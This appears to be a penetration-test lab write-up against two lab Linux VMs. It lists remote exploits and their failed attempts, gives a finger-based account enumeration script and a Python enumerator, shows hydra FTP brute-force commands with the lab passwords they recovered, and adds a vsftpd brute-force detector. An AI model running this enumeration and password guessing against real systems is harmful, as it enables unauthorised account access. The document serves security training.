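    """Split each non-empty line into its three ';'-separated fields.
    The description may itself contain ';', so only the first two splits count."""
    records: List[Record] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(";", 2)
        if len(parts) == 3:
            records.append((parts[0], parts[1], parts[2]))
    return records


def category(url: str) -> str:
    """'.../exp/exploits/remote/foo.c' -> 'remote'."""
    m = re.search(r"/exploits/([^/]+)/", url)
    return m.group(1) if m else ""


def keyword_hits(line: str, keywords: List[str] = KEYWORDS) -> Set[str]:
    """Whole-word, case-insensitive matches over the whole record, as grep -w -i -f does.
    Matching the full line matters: 'telnet.c' in the URL is a hit even when the
    description only says 'telnetd', which -w does not match."""
    return {k for k in keywords
            if re.search(r"(?<!\w)" + re.escape(k) + r"(?!\w)", line, re.IGNORECASE)}


def names_other_platform(desc: str, target: str = "linux") -> bool:
    """True when the description names a platform from OTHER_PLATFORMS but not the target."""
    words = set(re.findall(r"[a-z0-9]+", desc.lower()))
    return bool(words & OTHER_PLATFORMS) and target not in words


def triage(text: str, wanted: str = "remote", target: str = "linux") -> Dict[str, List[str]]:
    """Return {url: sorted keyword hits} for records passing all three filters,
    unique by URL (the report's sort -u)."""
    kept: Dict[str, List[str]] = {}
    for date, url, desc in parse_records(text):
        if category(url) != wanted:
            continue
        hits = keyword_hits(";".join((date, url, desc)))
        if not hits or names_other_platform(desc, target):
            continue
        kept[url] = sorted(hits)
    return kept


if __name__ == "__main__":
    for url, hits in triage(SAMPLE_LIST).items():
        print(url, hits)
```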

$ cat possible_remote_200.txt
....;http://www.anyside.org/exp/exploits/remote/09.16.MS03-039-exp.c;Remote Windows exploit for the RPC DCOM long filename heap overflow discovered by NSFOCUS. Related advisory
....;http://www.anyside.org/exp/exploits/remote/101_ncat.c;MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4
....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit
....;http://www.anyside.org/exp/exploits/remote/DComExpl_UnixWin32.zip;Windows port of the remote exploit utilizing the DCOM RPC overflow originally coded by H D Moore.
....;http://www.anyside.org/exp/exploits/remote/Mercury-IMAP-exp.txt;Exploit code for the Mercury32 IMAP Rename buffer overflow
....;http://www.anyside.org/exp/exploits/remote/MercuryMail-exp.txt;Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit for Apache + OpenSSL v0.9.6d and below. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.
....;http://www.anyside.org/exp/exploits/remote/apache-squ1rt.c;Apache <= 2.0.52 HTTP GET Remote Denial of Service Exploit
....;http://www.anyside.org/exp/exploits/remote/apache_xpl.txt;Apache 2.0.52 and earlier DoS
....;http://www.anyside.org/exp/exploits/remote/dcom.c;Remote exploit utilizing the DCOM RPC overflow discovered by LSD. Includes targets for Windows 2000 and XP. Binds a shell on port 4444.
....;http://www.anyside.org/exp/exploits/remote/getusr.c;Exploit that makes use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.
....;http://www.anyside.org/exp/exploits/remote/httpdDoS-pl.txt;Denial of service test exploit for the flaw in Apache httpd 2.0.49
....;http://www.anyside.org/exp/exploits/remote/ipswitch.c;Ipswitch IMAP Server "LOGIN" Command Remote Stack Overflow Exploit
....;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.tar.gz;Apache 1.3.*-2.0.48 remote users disclosure exploit - Checks Apache webservers for a wrong default configuration of mod_userdir which allows account name guessing and then attempts to login to the found accounts with ftp. Effective against Linux and *BSD boxes.
....;http://www.anyside.org/exp/exploits/remote/rpc!exec.c;Windows remote rpc dcom exploit which bypasses non-executable stack protection by using return into libc. Tested against OverflowGuard and StackDefender (with kernel32 imagebase randomization) running on Windows 2000 SP0 and Windows XP SP0.
....;http://www.anyside.org/exp/exploits/remote/telnet.c;Solaris 2.6, 7, and 8 telnetd remote exploit.
....;http://www.anyside.org/exp/exploits/remote/wgetusr.c;Exploit that makes use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.
2003-12-8;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.c;Apache 1.3.*-2.0.48 mod_userdir remote users disclosure Exploit
2003-4-1;http://www.anyside.org/exp/exploits/remote/rpcexp.c;Microsoft Windows RPC Locator Service remote exploit. Binds cmd.exe to port 5151. Tested again Windows 2000 SP3 and Windows NT 4 SP6a.
2003-9-18;http://www.anyside.org/exp/exploits/remote/mounty.c;Remote root exploit for rpc.mountd that makes use of the xlog off-by-one vulnerability discussed
2004-1-4;http://www.anyside.org/exp/exploits/remote/wts_bo.c;Jordan Windows Telnet Server v1.2 remote buffer overflow exploit. Binds a shell on port 9191. Tested on Win32 and Unix.
2004-4-25;http://www.anyside.org/exp/exploits/remote/lsasrv.c;Windows Lsasrv.dll RPC ms04011 buffer overflow Remote Exploit
2004-5-2;http://www.anyside.org/exp/exploits/remote/HOD-ms04011-lsasrv-expl.c;MS04011 Lsasrv.dll RPC buffer overflow remote exploit
2004-9-24;http://www.anyside.org/exp/exploits/remote/mdaemon_imap.c;Remote buffer overflow in MDaemon IMAP and SMTP server
2004-9-3;http://www.anyside.org/exp/exploits/remote/sm00ny-courier_imap_fsx.c;Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit
2005-03-17;http://www.anyside.org/exp/exploits/remote/goodtech.c;GoodTech Telnet Server < 5.0.7 Remote Buffer Overflow Exploit
2005-04-25;http://www.anyside.org/exp/exploits/remote/goodtech_expl.c;GoodTech Telnet Server < 5.0.7 Remote BoF Exploit
2005-04-30;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd SNMP proxy daemon format string exploit
2005-06-07;http://www.anyside.org/exp/exploits/remote/2005060701.txt;IPSwitch IMAP Server LOGON Remote Stack Overflow
2005-09-20;http://www.anyside.org/exp/exploits/remote/2005092001.txt;Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit
2006-03-10;http://www.anyside.org/exp/exploits/remote/2006031002.txt;Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031901.txt;Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031903.txt;Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit
2006-06-05;http://www.anyside.org/exp/exploits/remote/2006060506.txt;Linux Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit
2006-07-23;http://www.anyside.org/exp/exploits/remote/2006072301.txt;Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
2006-08-21;http://www.anyside.org/exp/exploits/remote/2006082105.txt;Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2006-09-11;http://www.anyside.org/exp/exploits/remote/2006091101.txt;Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)
2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2007-01-15;http://www.anyside.org/exp/exploits/remote/2007011502.txt;Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit
2007-02-01;http://www.anyside.org/exp/exploits/remote/2007020107.txt;CA BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit
2007-02-23;http://www.anyside.org/exp/exploits/remote/2007022306.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit
2007-03-01;http://www.anyside.org/exp/exploits/remote/2007030102.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit
2007-03-10;http://www.anyside.org/exp/exploits/remote/2007031002.txt;MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)
2007-03-24;http://www.anyside.org/exp/exploits/remote/2007032401.txt;Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
2007-03-30;http://www.anyside.org/exp/exploits/remote/2007033002.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
2007-04-07;http://www.anyside.org/exp/exploits/remote/2007040701.txt;Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
2007-04-15;http://www.anyside.org/exp/exploits/remote/2007041501.txt;MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445)
2007-05-26;http://www.anyside.org/exp/exploits/remote/2007052601.txt;Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
2007-05-30;http://www.anyside.org/exp/exploits/remote/2007053001.txt;Eudora 7.1.0.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day
2007-06-22;http://www.anyside.org/exp/exploits/remote/2007062201.txt;Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
2007-07-08;http://www.anyside.org/exp/exploits/remote/2007070801.txt;Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
2007-09-03;http://www.anyside.org/exp/exploits/remote/2007090301.txt;CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)
2007-10-14;http://www.anyside.org/exp/exploits/remote/2007101401.txt;Apache Tomcat (webdav) Remote File Disclosure Exploit
2007-10-21;http://www.anyside.org/exp/exploits/remote/2007102101.txt;Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
2007-12-18;http://www.anyside.org/exp/exploits/remote/2007121805.txt;MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)
2008-04-04;http://www.anyside.org/exp/exploits/remote/2008040401.txt;Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)
2008-04-06;http://www.anyside.org/exp/exploits/remote/2008040601.txt;Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
2008-06-30;http://www.anyside.org/exp/exploits/remote/2008063003.txt;Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS
2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071701.txt;Debian

Page 18: Root Password

OpenSSH Remote SELinux Privilege Elevation Exploit (auth)2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071702.txt;Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit2008-07-18;http://www.anyside.org/exp/exploits/remote/2008071801.txt;Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)2008-08-11;http://www.anyside.org/exp/exploits/remote/2008081101.txt;Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability2008-09-05;http://www.anyside.org/exp/exploits/remote/2008090501.txt;MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC2008-09-05;http://www.anyside.org/exp/exploits/remote/2008090503.txt;MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC

While this list looks impressive in length, removing the exploits that do not match the operating system, the installed software or its exact version, or that do not yield a privilege escalation, leaves only three candidates:

....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit for Apache + OpenSSL v0.9.6d and below. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.
2005-04-30;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd SNMP proxy daemon format string exploit

ii. Exploits – round 1

The 3 exploits found were downloaded and reviewed. The following lists the exploits in the order they were attempted (from most to least likely to work).

! Snmppd SNMP proxy daemon format string exploit.

Reviewing the source code for this exploit reveals that this exploit appears to match all of the required criteria. The code was successfully compiled after making major modifications to the source to fix syntax issues due to line wrapping/formatting defects. The execution of the exploit was unsuccessful.

! Remote exploit for Apache + OpenSSL v0.9.6d and below.

While the Apache version matches perfectly, the kernel version 2.4.20-8 is more commonly associated with a Red Hat 9.0 installation than with Red Hat 8.0, so the OpenSSL build this exploit targets may not be the one installed. The code was successfully compiled after minor modifications to the source to supply missing OpenSSL include files. The execution of the exploit was unsuccessful.

! ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit.

Reviewing the code for this exploit reveals that it was written in 1998. The possibility of this exploit being successful was deemed to be very slim. The exploit was successfully compiled after making minor modifications to the source to fix syntax issues due to line wrapping/formatting defects. The execution of the exploit was unsuccessful.

iii. Research via secwatch.org

Having exhausted the exploits known to the anyside.org site, the secwatch.org site was used to continue the search. The search results were quite extensive compared to the anyside.org list. However, the only additional exploit located was the “UW imapd IMAP 4.1 server”.

iv. Exploits – round 2

After an extensive review of possible exploits, only one additional candidate was located: the “UW imapd IMAP 4.1 server” exploit.

! UW imapd IMAP 4.1 server.

This exploit is meant for the 2001.315 version of the uw-imapd service. The service was fingerprinted as “UW Imapd 2001.315rh”. The rh addition to the version may indicate that Red Hat has applied a patch to resolve the vulnerability. The code was successfully compiled without issues. The execution of the exploit was unsuccessful.

D. User discovery

i. Abuse of finger

The finger service running on port 79/tcp provides the ability to brute force user names on the cptvm1 host: fingerd answers a query for an existing account with that account's details and a query for an unknown name with an error, so a list of common user names can be checked one name at a time. To accomplish this, a shell script executing finger over a list of user names was implemented. The list of user names was generated by googling for a list of common user names. The VM running back|track3 did not have a proper finger client installed, so this command was executed from the host machine under OS X.

The names of 18 users on the cptvm1 host were discovered. Reviewing the output from the finger command reveals that of the 18 user accounts, only the “root”, “user” and “postgres” users have the ability to login to a standard shell.

$ cat fingerListOfUserNames.sh
#!/bin/bash
# Usage: fingerListOfUserNames.sh <host> <wordlist>
# Query finger once per candidate name and keep the raw replies.
while read userName; do
    finger "${userName}@$1" >> "usersOn$1_RAW.txt"
done < "$2"
# Drop "finger: <name>: no such user." errors and the "[host]" banner lines,
# then keep the login name from every "Login: <name> ..." line.
sed -e '/^finger:/d' -e "/^\[$1/d" "usersOn$1_RAW.txt" > "usersOn$1_FOUND.txt"
awk '/^Login:/ { print $2 }' "usersOn$1_FOUND.txt" | sort -u > "usersOn$1.txt"

$ fingerListOfUserNames.sh 192.168.1.200 usernames.txt

$ ls -alF
total 96
drwxr-xr-x   7 matt  matt    238 Feb 11 22:23 ./
drwxr-xr-x  11 matt  matt    374 Feb 10 19:12 ../
-rwxr-xr-x   1 matt  matt    291 Feb 11 22:06 fingerListOfUserNames.sh*
-rw-r--r--   1 matt  matt   3550 Feb 10 19:31 usernames.txt
-rw-r--r--   1 matt  matt    107 Feb 11 22:06 usersOn192.168.1.200.txt
-rw-r--r--   1 matt  matt   4699 Feb 11 21:46 usersOn192.168.1.200_FOUND.txt
-rw-r--r--   1 matt  matt  26235 Feb 11 21:46 usersOn192.168.1.200_RAW.txt

$ cat usersOn192.168.1.200.txt
adm
apache
daemon
ftp
lp
mail
nfsnobody
nobody
nscd
operator
postgres
root
rpc
rpcuser
sshd
user
uucp
vcsa
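The enumeration above, as an added Python example that is not part of the original report: it speaks the finger protocol directly (RFC 1288: connect to 79/tcp, send the name followed by CRLF, read until close) and reproduces the sed/awk filtering of fingerListOfUserNames.sh, then adds the triage the report did by eye, separating accounts with an interactive shell from nologin accounts. The replies in SAMPLE_REPLIES are constructed to mimic Linux fingerd output and are not captures from the lab host; the function names and the NON_LOGIN_SHELLS list are assumptions.

```python
"""Finger-based account enumeration (RFC 1288) and login-shell triage.

Added example, not the report's own code. Sample replies are constructed."""
import re
import socket
from typing import Callable, Dict, Iterable, List, Optional

FINGER_PORT = 79
# Shells that do not give an interactive login (assumed list of common values).
NON_LOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                    "/bin/sync", "/sbin/halt", "/sbin/shutdown"}


def finger_query(host: str, user: str, timeout: float = 5.0) -> str:
    """Send one RFC 1288 query ('<user>\\r\\n') to host:79 and return the raw reply."""
    with socket.create_connection((host, FINGER_PORT), timeout=timeout) as s:
        s.sendall(user.encode("ascii", "ignore") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:          # fingerd closes the connection after the reply
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")


_LOGIN_RE = re.compile(r"^Login:\s*(\S+)", re.MULTILINE)
_SHELL_RE = re.compile(r"Shell:\s*(\S+)")


def parse_finger_reply(reply: str) -> Optional[Dict[str, str]]:
    """Return {'login': ..., 'shell': ...} for a real account, else None.

    Linux fingerd answers 'finger: <name>: no such user.' for unknown names;
    the report's sed filter (/^finger:/d) drops exactly those lines."""
    if reply.startswith("finger:") or "no such user" in reply:
        return None
    m = _LOGIN_RE.search(reply)
    if not m:
        return None
    shell = _SHELL_RE.search(reply)
    return {"login": m.group(1), "shell": shell.group(1) if shell else ""}


def enumerate_accounts(candidates: Iterable[str],
                       query: Callable[[str], str]) -> Dict[str, str]:
    """Map login -> shell for every candidate name that finger confirms.

    `query` is finger_query bound to a host, or a stub for offline use."""
    found: Dict[str, str] = {}
    for name in candidates:
        info = parse_finger_reply(query(name))
        if info:
            found[info["login"]] = info["shell"]
    return dict(sorted(found.items()))


def interactive_accounts(accounts: Dict[str, str]) -> List[str]:
    """Accounts whose shell is a real login shell (the report's root/user/postgres case)."""
    return [u for u, sh in accounts.items() if sh and sh not in NON_LOGIN_SHELLS]


# Constructed replies in the shape Linux fingerd produces (not from the lab host).
SAMPLE_REPLIES = {
    "root": "Login: root          Name: root\nDirectory: /root        Shell: /bin/bash\n"
            "Never logged in.\nNo mail.\nNo Plan.\n",
    "user": "Login: user          Name: \nDirectory: /home/user   Shell: /bin/bash\n"
            "Never logged in.\n",
    "ftp": "Login: ftp           Name: FTP User\nDirectory: /var/ftp     Shell: /sbin/nologin\n",
    "admin": "finger: admin: no such user.\n",
}


def demo() -> List[str]:
    """Run the enumeration against the constructed replies instead of a live host."""
    accounts = enumerate_accounts(SAMPLE_REPLIES, lambda u: SAMPLE_REPLIES[u])
    return interactive_accounts(accounts)


if __name__ == "__main__":
    # Against a real target: enumerate_accounts(names, lambda u: finger_query(host, u))
    print(demo())
```

Against a live host, pass `lambda u: finger_query("192.168.1.200", u)` as the query callable; one TCP connection per name is what the original shell loop does too, so the request rate is the same.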

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp       echo
  21/tcp      ftp        vsftpd 1.1.3
  22/tcp      ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp      telnet     Linux telnetd
  79/tcp      finger     Linux fingerd
  80/tcp      http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp     POSSIBLY pop2
  110/tcp     pop3       ipopd 2001.78rh
  111/tcp     rpcbind 2 (rpc #100000)
  143/tcp     imap       UW Imapd 2001.315rh
  199/tcp     smux       Linux SNMP multiplexer
  443/tcp     ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp     rquotad 1-2 (rpc #100011)
  993/tcp     imaps
  995/tcp     pop3s
  6000/tcp    X11
  32768/tcp   status 1 (rpc #100024)
  32770/tcp   mountd 1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp       echo
  13/udp      daytime
  37/udp      time (32 bits)
  111/udp     rpcbind 2 (rpc #100000)
  123/udp     ntp
  161/udp     snmp       SNMPv1 server (public)
  162/udp     snmptrap
  631/udp     unknown
  683/udp     rquotad 1-2 (rpc #100011)
User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd, operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp      ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp     rpcbind 2 (rpc #100000)
  939/tcp     status 1 (rpc #100024)

E. Brute force password guessing

i. Discovery of password for “user” account

As the remote exploits were unsuccessful, a brute force attack against the passwords of the “user” and “postgres” accounts was attempted. Password guessing is normally stifled by controls such as locking an account after a maximum number of failed logins or imposing an increasing delay between invalid attempts. The ftp service listening on port 21/tcp applied neither. The hydra utility was selected as it accepts a list of user names (-L), a list of passwords (-P) and the protocol to attack; the -e n switch additionally tries an empty password for each user. The user accounts file was populated with the accounts configured to log in with a standard shell. The root user was removed from the list as the ftp service did not allow root logins. The password list was located by googling for a list of the most common passwords in use.

The attack discovered the password “digital” for the “user” account. The credentials were validated by sshing into the cptvm1 host. A login to the cptvm2 host with the same user name and password was also attempted and failed.

bt user # cat usernames/cptvm1.users.txt
user
postgres

bt user # hydra -e n -L usernames/cptvm1.users.txt -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-27 22:57:29
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 402.00 tries/min, 402 tries in 00:01h, 139356 todo in 05:47h
[STATUS] 402.00 tries/min, 1206 tries in 00:03h, 138552 todo in 05:45h
[STATUS] 404.71 tries/min, 2833 tries in 00:07h, 136925 todo in 05:39h
[STATUS] 405.60 tries/min, 6084 tries in 00:15h, 133674 todo in 05:30h
[STATUS] 406.06 tries/min, 12588 tries in 00:31h, 127170 todo in 05:14h
[STATUS] 406.21 tries/min, 19092 tries in 00:47h, 120666 todo in 04:58h
[STATUS] 406.27 tries/min, 25595 tries in 01:03h, 114163 todo in 04:42h
[21][ftp] host: 192.168.1.200 login: user password: digital
[STATUS] 406.33 tries/min, 32100 tries in 01:19h, 107658 todo in 04:25h
[STATUS] 406.34 tries/min, 38602 tries in 01:35h, 101156 todo in 04:09h
[STATUS] 406.36 tries/min, 45106 tries in 01:51h, 94652 todo in 03:53h
[STATUS] 406.40 tries/min, 51613 tries in 02:07h, 88145 todo in 03:37h
[STATUS] 406.43 tries/min, 58119 tries in 02:23h, 81639 todo in 03:21h
[STATUS] 406.46 tries/min, 64627 tries in 02:39h, 75131 todo in 03:05h
[STATUS] 406.47 tries/min, 71133 tries in 02:55h, 68625 todo in 02:49h
[STATUS] 406.49 tries/min, 77639 tries in 03:11h, 62119 todo in 02:33h
[STATUS] 406.50 tries/min, 84145 tries in 03:27h, 55613 todo in 02:17h
[STATUS] 406.53 tries/min, 90656 tries in 03:43h, 49102 todo in 02:01h
[STATUS] 406.53 tries/min, 97160 tries in 03:59h, 42598 todo in 01:45h
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-28 03:05:41
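The attack above ran at roughly 400 tries per minute for four hours because vsftpd neither locked the account nor throttled failures. The same activity is loud on the server side. The following added Python example, which is not from the original report, shows the detection a defender would want: a per-client sliding window over vsftpd-style log lines that flags a burst of FAIL LOGIN entries and, separately, the OK LOGIN that follows such a burst (the moment the guessing worked). The log lines are constructed in the format vsftpd writes with xferlog_std_format=NO; they are not the lab host's log, and the threshold, window and function names are assumptions.

```python
"""Flag FTP password guessing in vsftpd-style log lines.

Added example, not the report's own code. The sample log is constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# vsftpd (xferlog_std_format=NO) writes lines such as
#   Tue Jan 27 22:57:30 2009 [pid 1234] [user] FAIL LOGIN: Client "192.168.1.50"
# CONNECT lines carry no [user] field, hence the optional group.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?(?P<event>OK LOGIN|FAIL LOGIN|CONNECT): '
    r'Client "(?P<client>[^"]+)"'
)


def parse_line(line: str) -> Optional[Tuple[datetime, str, str, str]]:
    """-> (timestamp, event, client, user) or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("event"), m.group("client"), m.group("user") or ""


def detect_bruteforce(lines, threshold: int = 20,
                      window: timedelta = timedelta(minutes=1)):
    """Sliding-window failure counter per client IP.

    Returns a list of (kind, client, user, timestamp):
      'burst'               - `threshold` or more FAIL LOGINs from one client inside `window`
      'success-after-burst' - an OK LOGIN from a client that already tripped 'burst'
    Hydra's ~400 tries/min is far above any threshold a human would reach."""
    recent = defaultdict(deque)   # client -> timestamps of failures inside the window
    flagged = set()
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, event, client, user = rec
        if event == "FAIL LOGIN":
            q = recent[client]
            q.append(ts)
            while q and ts - q[0] > window:     # expire failures older than the window
                q.popleft()
            if len(q) >= threshold and client not in flagged:
                flagged.add(client)
                findings.append(("burst", client, user, ts))
        elif event == "OK LOGIN" and client in flagged:
            findings.append(("success-after-burst", client, user, ts))
    return findings


# --- constructed sample log (not the lab host's log) ---------------------------
T0 = datetime(2009, 1, 27, 22, 57, 29)


def _vsftpd_line(ts: datetime, event: str, client: str, user: Optional[str] = None) -> str:
    who = f"[{user}] " if user is not None else ""
    return f'{ts:%a %b %d %H:%M:%S %Y} [pid 1234] {who}{event}: Client "{client}"'


def build_sample_log() -> List[str]:
    attacker, legit = "192.168.1.50", "192.168.1.77"
    lines = [_vsftpd_line(T0, "CONNECT", attacker)]
    # 25 guesses against "user", one every two seconds (a slow attacker).
    lines += [_vsftpd_line(T0 + timedelta(seconds=2 * i + 1), "FAIL LOGIN", attacker, "user")
              for i in range(25)]
    lines.append(_vsftpd_line(T0 + timedelta(seconds=50), "OK LOGIN", legit, "postgres"))
    lines.append(_vsftpd_line(T0 + timedelta(seconds=52), "OK LOGIN", attacker, "user"))
    return lines


def demo():
    return detect_bruteforce(build_sample_log())


if __name__ == "__main__":
    for kind, client, user, ts in demo():
        print(f"{ts:%H:%M:%S} {kind:22} client={client} user={user}")
```

The burst rule alone produces noise from misconfigured clients; the success-after-burst finding is the one worth paging on, and it is exactly what the `[21][ftp] host: ... login: user password: digital` line above looks like from the other side.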

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp       echo
  21/tcp      ftp        vsftpd 1.1.3
  22/tcp      ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp      telnet     Linux telnetd
  79/tcp      finger     Linux fingerd
  80/tcp      http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp     POSSIBLY pop2
  110/tcp     pop3       ipopd 2001.78rh
  111/tcp     rpcbind 2 (rpc #100000)
  143/tcp     imap       UW Imapd 2001.315rh
  199/tcp     smux       Linux SNMP multiplexer
  443/tcp     ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp     rquotad 1-2 (rpc #100011)
  993/tcp     imaps
  995/tcp     pop3s
  6000/tcp    X11
  32768/tcp   status 1 (rpc #100024)
  32770/tcp   mountd 1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp       echo
  13/udp      daytime
  37/udp      time (32 bits)
  111/udp     rpcbind 2 (rpc #100000)
  123/udp     ntp
  161/udp     snmp       SNMPv1 server (public)
  162/udp     snmptrap
  631/udp     unknown
  683/udp     rquotad 1-2 (rpc #100011)
User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd, operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa
Username/password: user/digital

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp      ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp     rpcbind 2 (rpc #100000)
  939/tcp     status 1 (rpc #100024)

ii. Discovery of password for “cptvm1” and “cptvm2” accounts

Upon the successful login to the cptvm1 host, the /etc/passwd file was reviewed. This action provided all of the names for the user accounts on the cptvm1 host. Two accounts of high interest, “cptvm1” and “cptvm2”, were identified. While researching the configuration of the cptvm1 host, a brute force password guessing attack was launched against the “cptvm1” and “cptvm2” users.

The initial attack carried an unintended switch on the command line (-f). This switch instructs hydra to stop as soon as a valid user name/password pair is found. As a result, a second attack was needed to discover the “cptvm2” account password. The attacks yielded the “cptvm1” and “cptvm2” passwords (cptvm1/windows, cptvm2/linux). The credentials were validated by sshing into the cptvm1 host with both accounts. Successful ssh connections were also established to the cptvm2 host using both accounts. The /etc/passwd file on the cptvm2 host was then reviewed for accounts of interest.

bt ~ # cat usernames/cptvm1.users2.txt
cptvm1
cptvm2

bt ~ # hydra -e n -f -L usernames/cptvm1.users2.txt -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 18:26:44
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 416.00 tries/min, 416 tries in 00:01h, 139342 todo in 05:35h
[STATUS] 405.33 tries/min, 1216 tries in 00:03h, 138542 todo in 05:42h
[STATUS] 406.86 tries/min, 2848 tries in 00:07h, 136910 todo in 05:37h
